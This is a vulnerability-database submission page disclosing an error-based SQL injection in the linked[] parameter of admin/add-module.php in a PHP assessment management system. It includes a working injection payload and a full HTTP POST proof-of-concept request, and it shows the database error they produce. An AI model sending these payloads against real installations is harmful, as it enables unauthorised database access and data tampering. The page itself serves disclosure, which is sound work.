제출 #846713: Assessment Management System admin/add-module.php SQL Injection Vulnerability v1.0 SQL Injection정보

제목Assessment Management System admin/add-module.php SQL Injection Vulnerability v1.0 SQL Injection
설명# Assessment Management System admin/add-module.php SQL Injection Vulnerability A SQL injection vulnerability exists in the `admin/add-module.php` file of the Assessment Management System. The application directly concatenates user-controlled input from the `linked[]` parameter into an SQL `INSERT` statement without proper sanitization or parameterized statements. As a result, an attacker can inject arbitrary SQL syntax into the backend database query. ## ## Impact of the Vulnerability This vulnerability may allow an attacker to manipulate backend SQL queries, trigger database error-based responses, and potentially extract sensitive database information. In some cases, it may also affect data integrity by altering the values inserted into the `module` table. ## ## Payload ``` Supervisor'and/**/extractvalue(1,concat(char(126),md5(1958213939)))and's ``` Supervisor'and/**/extractvalue(1,concat(char(126),md5(1958213939)))and's ## Proof of Concept Send the following request to the vulnerable endpoint: ```http POST /admin/add-module.php HTTP/1.1 Host: assessment Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=f11os756ltsdgbtk776pklo8cs code=dgfs&name=dsfg&level=3&leader=s1&description=dsgf&linked%5B%5D=Supervisor'and/**/extractvalue(1,concat(char(126),md5(1958213939)))and's&addmore%5B%5D=&submit=Add+Module ``` When the above payload is submitted through the `linked[]` parameter, the server responds with a database error message containing the injected MD5 marker: XPATH syntax error: '~3320503cc081cf7022d480a9f46fd9f' This demonstrates that user input is embedded into the SQL statement and executed by the database engine, confirming the presence of an error-based SQL injection vulnerability in `admin/add-module.php`. ## ## Source Download ``` [Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/) ``` [Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/)
원천⚠️ https://github.com/zzzxc643/CVE1/blob/main/assessment/vul2.md
사용자
 SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
제출2026. 06. 03. AM 07:05 (1 월 ago)
모더레이션2026. 07. 03. PM 08:48 (1 month later)
상태중복
VulDB 항목338582 [code-projects Assessment Management 1.0 /admin/add-module.php linked[] SQL 주입]
포인트들0

Want to stay up to date on a daily basis?

Enable the mail alert feature now!